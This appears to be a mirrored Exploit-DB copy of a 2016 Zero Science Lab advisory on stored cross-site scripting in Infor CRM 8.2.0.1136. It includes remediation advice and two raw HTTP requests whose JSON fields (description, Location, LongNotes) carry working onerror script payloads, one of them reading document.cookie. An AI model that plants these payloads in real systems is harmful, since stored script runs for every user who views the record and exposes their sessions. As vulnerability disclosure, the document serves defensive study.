Infor CRM 8.2.0.1136 – Multiple HTML Script Injection Vulnerabilities

  • 作者: LiquidWorm
    日期: 2016-02-26
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/39497/
  • 
    Infor CRM 8.2.0.1136 Multiple HTML Script Injection Vulnerabilities
    
    
    Vendor: Infor
    Product web page: http://www.infor.com
    Affected version: 8.2.0.1136
    
    
    Summary: Infor® CRM, formerly Saleslogix, is an award-winning
    customer relationship management (CRM) solution that provides
    a complete view of customer interactions, so your business can
    collaborate and respond promptly and knowledgeably to customer
    inquiries, sales opportunities, and service requests. Infor CRM
    includes a robust suite of sales, marketing, and service capabilities,
    to offer businesses of all sizes a fast, flexible, and affordable
    solution for finding, winning, and growing profitable customer
    relationships.
    
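    Desc: Infor CRM suffers from multiple stored cross-site scripting
    vulnerabilities. Input passed to several POST/PUT parameters in
    JSON format is not properly sanitised before being returned to the
    user. This can be exploited to execute arbitrary HTML and script
    code in a user's browser session in the context of an affected site.
    Because the injected markup is stored with the record, it can run
    for any user who later views that record, not only for the account
    that submitted it. The affected fields need to be HTML-encoded when
    they are rendered, in addition to being validated on input.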
    
    Tested on: Microsoft-IIS/8.5
     ASP.NET/4.0.30319
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    @zeroscience
    
    
    Advisory ID: ZSL-2016-5308
    Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5308.php
    
    
    21.01.2016
    
    ---
    
    
    ----------------------------------
    Affected parameter(s): description
    ----------------------------------
    
    PUT /SLXClient/slxdata.ashx/slx/system/-/attachments(%22eUSERA0004IX%22)?_includeFile=false&format=json&_t=1456358980947 HTTP/1.1
    Host: intranet.zeroscience.mk
    
    
    {$updated: "/Date(1456359095000)/", $key: "eUSERA0004IX",…}
    "": ""
    $descriptor: ""
    $etag: "+CgjMLB+0nA="
    $httpStatus: 200
    $key: "eUSERA0004IX"
    $lookup: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json"
    $post: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json"
    $schema: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$schema?format=json"
    $service: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$service?format=json"
    $template: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$template?format=json"
    $updated: "/Date(1456359095000)/"
    $url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments('eUSERA0004IX')"
    accountId: null
    activityId: null
    attachDate: "2016-01-25T00:09:39Z"
    contactId: null
    contractId: null
    createDate: "/Date(1456359095000)/"
    createUser: "UUSERA0005W0"
    dataType: "R"
    defectId: null
    description: "<img src=j onerror=confirm(document.cookie) >"
    details: {createSource: null}
    documentType: null
    fileExists: true
    fileName: "inforcrm_xss.png"
    fileSize: 101722
    historyId: null
    leadId: null
    modifyDate: "/Date(1456359095000)/"
    modifyUser: "UUSERA0005W0"
    opportunityId: null
    physicalFileName: "!eUSERA0004IXinforcrm_xss.png"
    productId: null
    remoteStatus: null
    returnId: null
    salesOrderId: null
    ticketId: null
    url: null
    user: {$key: "UUSERA0005W0"}
    
    
    
    -----------------------------------------------------------
    Affected parameter(s): Description, Location, and LongNotes
    -----------------------------------------------------------
    
    POST /SLXClient/slxdata.ashx/slx/system/-/activities?format=json&_t=1456357736977 HTTP/1.1
    Host: intranet.zeroscience.mk
    
    
    {$httpStatus: 200, $descriptor: "", ActivityBasedOn: null, Alarm: false,…}
    $descriptor: ""
    $httpStatus: 200
    AccountId: null
    AccountName: null
    ActivityAttendees: {}
    ActivityBasedOn: null
    Alarm: false
    AlarmTime: "2016-01-24T22:45:00Z"
    AllowAdd: true
    AllowComplete: true
    AllowDelete: true
    AllowEdit: true
    AllowSync: true
    AppId: null
    Attachment: false
    AttachmentCount: null
    AttendeeCount: 0
    Category: "Pleasantville"
    ContactId: null
    ContactName: null
    CreateDate: "/Date(-62135596800000)/"
    CreateUser: null
    Description: "<img src=zsl onerror=prompt(1) >"
    Details: {ForeignId1: null, ForeignId2: null, ForeignId3: null, ForeignId4: null, ProjectId: null,…}
    ChangeKey: null
    CreateSource: null
    ForeignId1: null
    ForeignId2: null
    ForeignId3: null
    ForeignId4: null
    GlobalSyncId: null
    ProjectId: null
    Tick: null
    UserDef1: null
    UserDef2: null
    UserDef3: null
    Duration: "0"
    EndDate: "/Date(1456359315286)/"
    LeadId: null
    LeadName: null
    Leader: {$key: "UUSERA0005W0", $descriptor: "Userovich, User"}
    $descriptor: "Userovich, User"
    $key: "UUSERA0005W0"
    Location: "<img src=zsl onerror=prompt(2) >"
    LongNotes: "<img src=zsl onerror=prompt(3) >"
    ModifyDate: "/Date(-62135596800000)/"
    ModifyUser: null
    Notes: "Zero Science Lab"
    OpportunityId: null
    OpportunityName: null
    OriginalDate: "/Date(1456358415286)/"
    PhoneNumber: null
    Priority: "1"
    ProcessId: null
    ProcessNode: null
    RecurIterations: 0
    RecurPeriod: 0
    RecurPeriodSpec: 0
    RecurSkip: null
    RecurrenceState: "rsNotRecurring"
    Recurring: false
    Resources: {}
    Rollover: false
    StartDate: "2016-01-25T00:00:05Z"
    TicketId: null
    TicketNumber: null
    Timeless: true
    Type: "atToDo"
    UserActivities: {}
    $url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userActivities?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27"
    UserNotifications: {}
    $url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userNotifications?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27"